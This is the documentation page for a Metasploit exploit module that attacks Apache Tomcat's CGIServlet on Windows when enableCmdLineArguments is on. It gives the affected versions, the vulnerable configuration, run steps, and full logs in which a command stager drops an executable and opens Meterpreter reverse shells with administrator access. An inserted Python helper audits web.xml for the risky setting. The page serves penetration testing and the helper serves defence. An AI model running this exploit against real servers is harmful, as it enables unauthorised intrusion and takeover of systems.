metasploit-framework/documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md


Description

This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution.

Vulnerable Application

The following versions of Apache Tomcat on Windows are affected:

  • 9.0.0.M1 to 9.0.17
  • 8.5.0 to 8.5.39
  • 7.0.0 to 7.0.93

Also, the target needs to have the enableCmdLineArguments option enabled for the CGIServlet in conf\web.xml. For example:

<servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
        <param-name>cgiPathPrefix</param-name>
        <param-value>WEB-INF/cgi</param-value>
    </init-param>
    <init-param>
        <param-name>executable</param-name>
        <param-value></param-value>
    </init-param>
    <init-param>
        <param-name>enableCmdLineArguments</param-name>
        <param-value>true</param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
</servlet>

Also:

<servlet-mapping>
    <servlet-name>cgi</servlet-name>
    <url-pattern>/cgi/*</url-pattern>
</servlet-mapping>

Next, modify the conf\context.xml file, replacing <Context> with <Context privileged="true">.

Finally, a CGI script needs to be available in the webapps\ROOT\WEB-INF\cgi directory (the cgiPathPrefix configured above). For example, a .bat file containing:

@echo off
echo Content-Type: text/plain
echo.
echo Hello, World!
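The configuration above is what a defender should look for when auditing a Tomcat install. The following audit helper is an added example and is not part of the Metasploit module: it parses a conf\web.xml (with or without the javaee namespace Tomcat's shipped copy declares), reports every CGIServlet definition that has enableCmdLineArguments set to true, and checks a server version string against the affected ranges listed above.

```python
"""Audit helper (added example, not the module's code): flag the Tomcat
configuration and version ranges this page describes."""
import xml.etree.ElementTree as ET

# Affected ranges from the page, inclusive, as (major, minor, patch).
AFFECTED = [((9, 0, 0), (9, 0, 17)), ((8, 5, 0), (8, 5, 39)), ((7, 0, 0), (7, 0, 93))]

CGI_SERVLET = "org.apache.catalina.servlets.CGIServlet"


def parse_version(version):
    """'9.0.0.M1' -> (9, 0, 0); milestone suffixes are dropped, they all sit below 9.0.1."""
    return tuple(int(p) for p in version.split(".")[:3])


def is_affected_version(version):
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED)


def _local(tag):
    # Strip a '{namespace}' prefix so namespaced and bare web.xml files look the same.
    return tag.rsplit("}", 1)[-1]


def cgi_servlets_with_cmdline_args(web_xml_text):
    """Return the servlet-name of every CGIServlet with enableCmdLineArguments=true."""
    found = []
    for servlet in ET.fromstring(web_xml_text).iter():
        if _local(servlet.tag) != "servlet":
            continue
        fields, params = {}, {}
        for child in servlet:
            tag = _local(child.tag)
            if tag == "init-param":
                kv = {_local(c.tag): (c.text or "").strip() for c in child}
                params[kv.get("param-name")] = kv.get("param-value", "")
            else:
                fields[tag] = (child.text or "").strip()
        if fields.get("servlet-class") == CGI_SERVLET and \
                params.get("enableCmdLineArguments", "").lower() == "true":
            found.append(fields.get("servlet-name"))
    return found


# Constructed sample: the page's servlet definition inside a namespaced <web-app>.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param><param-name>enableCmdLineArguments</param-name><param-value>true</param-value></init-param>
  </servlet>
</web-app>"""

if __name__ == "__main__":
    print(cgi_servlets_with_cmdline_args(SAMPLE_WEB_XML), is_affected_version("9.0.17"))
```

A version outside the ranges with the option still enabled is worth reporting as well, since the setting itself is the risky part; the version check only tells you whether the unpatched behaviour is present.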

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/windows/http/tomcat_cgi_cmdlineargs
  3. Configure rhosts
  4. Configure TARGETURI
  5. Set a payload
  6. Run the module; you should get a session.

Scenarios

Apache Tomcat 9.0.17 with JDK 8 on Windows 10 Pro (x64)

Check Method

The check method of the exploit explicitly triggers the bug to verify that the target is vulnerable, so it should be accurate. To use it, here is an example:

msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 172.16.135.141:8080 - The target is vulnerable.

Code Execution

msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > exploit

[*] Started reverse TCP handler on 172.16.135.1:4444 
[*] Checking if 172.16.135.141 is vulnerable
[*] 172.16.135.141 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 172.16.135.141
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.141:51982) at 2019-06-18 15:26:54 -0500
[*] Command Stager progress - 100.02% done (100692/100668 bytes)

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit

Tomcat 8.5.20 with JDK 1.8.0_211-b12 on Windows 2012 (Build 9200)

msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 2.2.2.2:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress -   6.95% done (6999/100668 bytes)
[*] Command Stager progress -  13.91% done (13998/100668 bytes)
[*] Command Stager progress -  20.86% done (20997/100668 bytes)
[*] Command Stager progress -  27.81% done (27996/100668 bytes)
[*] Command Stager progress -  34.76% done (34995/100668 bytes)
[*] Command Stager progress -  41.72% done (41994/100668 bytes)
[*] Command Stager progress -  48.67% done (48993/100668 bytes)
[*] Command Stager progress -  55.62% done (55992/100668 bytes)
[*] Command Stager progress -  62.57% done (62991/100668 bytes)
[*] Command Stager progress -  69.53% done (69990/100668 bytes)
[*] Command Stager progress -  76.48% done (76989/100668 bytes)
[*] Command Stager progress -  83.43% done (83988/100668 bytes)
[*] Command Stager progress -  90.38% done (90987/100668 bytes)
[*] Command Stager progress -  97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49612) at 2019-06-24 20:44:45 -0400

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi
=====================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2019-06-24 20:44:19 -0400  %SystemDrive%
100777/rwxrwxrwx  73802  fil   2019-06-24 20:44:19 -0400  dKASF.exe
100777/rwxrwxrwx  67     fil   2019-06-20 21:52:49 -0400  example.bat
100777/rwxrwxrwx  69     fil   2019-06-24 15:15:13 -0400  test.bat

meterpreter > sysinfo
Computer        : WIN-EDKFSE5QPAB
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 3256 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi>cd ..\..\..\..\bin
cd ..\..\..\..\bin

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_HOME:   "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\temp"
Using JRE_HOME:        "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH:       "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\tomcat-juli.jar"
Server version: Apache Tomcat/8.5.20
Server built:   Aug 2 2017 21:35:49 UTC
Server number:  8.5.20.0
OS Name:        Windows Server 2012
OS Version:     6.2
Architecture:   amd64
JVM Version:    1.8.0_211-b12
JVM Vendor:     Oracle Corporation

C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>